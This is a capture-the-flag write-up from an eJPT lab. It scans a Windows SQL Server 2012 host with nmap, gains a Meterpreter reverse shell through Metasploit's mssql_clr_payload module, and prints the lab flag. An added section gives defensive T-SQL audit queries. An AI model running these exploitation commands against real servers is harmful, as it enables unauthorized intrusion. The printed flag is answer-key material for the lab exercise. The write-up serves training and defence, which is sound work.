Welcome to the Metasploit Framework CTF 1 lab in the eJPT course. Let’s get into it!
Attacker IP: 10.10.48.12
Target IP: target.ine.local - 10.3.30.92
Let’s start off with an nmap scan. Below we see that many ports are open, but let’s focus on what the task is asking: we want to find an SQL server we can exploit. The scan shows a Microsoft SQL Server service open on port 1433.
nmap -sV -sC 10.3.30.92
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2026-01-13 02:28 IST
Nmap scan report for target.ine.local (10.3.30.92)
Host is up (0.0031s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.6020.00; SP3
| ms-sql-ntlm-info:
| 10.3.30.92\MSSQLSERVER:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
|_ Product_Version: 6.3.9600
| ms-sql-info:
| 10.3.30.92\MSSQLSERVER:
| Instance name: MSSQLSERVER
| Version:
| name: Microsoft SQL Server 2012 SP3
| number: 11.00.6020.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP3
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-12T20:47:48
|_Not valid after: 2056-01-12T20:47:48
|_ssl-date: 2026-01-12T20:59:50+00:00; 0s from scanner time.
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=WIN-5BQ22OKH4SO
| Not valid before: 2026-01-11T20:47:49
|_Not valid after: 2026-07-13T20:47:49
|_ssl-date: 2026-01-12T20:59:50+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
| Product_Version: 6.3.9600
|_ System_Time: 2026-01-12T20:59:42+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
We can use Metasploit to gain a Meterpreter session with the module below. Let’s start msfconsole and set our options.
service postgresql start && msfconsole -q
search mssql
use windows/mssql/mssql_clr_payload
options
setg RHOSTS 10.3.30.92
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
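As an added example that is not part of the lab or the original post: the module above depends on a privileged SQL login (its defaults are sa with a blank password) and on CLR integration, which it switches on with sp_configure before loading an assembly. On the defending side, these T-SQL queries check for exactly those conditions on a SQL Server 2012-era instance like the one in this lab; sys.assemblies is per-database, so run that part in each database you care about.

```sql
-- Added audit script (not part of the lab or the original post).
-- Checks the conditions mssql_clr_payload relies on: a usable
-- sysadmin-level login, CLR integration, and loadable assemblies.

-- 1. SQL logins with an empty password (the module defaults to sa
--    with a blank password). PWDCOMPARE returns 1 when '' matches
--    the stored hash.
SELECT name, is_disabled
FROM   sys.sql_logins
WHERE  PWDCOMPARE('', password_hash) = 1;

-- 2. Is CLR integration enabled at the instance level? The module
--    sets this to 1 itself when it is off, so a value_in_use of 1
--    on a server that never needed CLR is worth investigating.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name = 'clr enabled';

-- 3. User-defined assemblies in the current database and their
--    permission sets. Anything that is not SAFE deserves a look:
--    an UNSAFE assembly can run arbitrary code inside the SQL
--    Server process, which is what a CLR payload does.
SELECT DB_NAME() AS database_name, name, permission_set_desc, create_date
FROM   sys.assemblies
WHERE  is_user_defined = 1;

-- 4. Databases marked TRUSTWORTHY, where EXTERNAL_ACCESS/UNSAFE
--    assemblies can load without being signed.
SELECT name, is_trustworthy_on
FROM   sys.databases
WHERE  is_trustworthy_on = 1;

-- Remediation when CLR is not required by any application:
-- switch it back off (this is a non-advanced option, so no
-- 'show advanced options' step is needed).
EXEC sp_configure 'clr enabled', 0;
RECONFIGURE;
```

Fixing the blank sa password and restricting who holds sysadmin matters more than the CLR switch, since a sysadmin login can simply re-enable it.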
After gaining access with our Meterpreter session, we move to the root of the C: drive and find our first flag there. We can cat it from here and submit the flag.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2021-12-15 09:58:20 +0530 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-06-18 17:48:29 +0530 BOOTNXT
040777/rwxrwxrwx 0 dir 2013-08-22 20:18:41 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2013-08-22 21:22:33 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2025-01-09 12:30:38 +0530 Program Files
040777/rwxrwxrwx 4096 dir 2024-12-15 14:57:59 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2015-08-13 21:42:59 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2021-12-31 13:30:32 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2025-01-09 12:42:28 +0530 Users
040777/rwxrwxrwx 24576 dir 2025-01-09 12:38:38 +0530 Windows
100444/r--r--r-- 398356 fil 2014-03-18 15:35:18 +0530 bootmgr
100666/rw-rw-rw- 34 fil 2026-01-13 02:18:09 +0530 flag1.txt
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cat flag1.txt
2f301bc8cdd949aca6ae3a6c5b43201c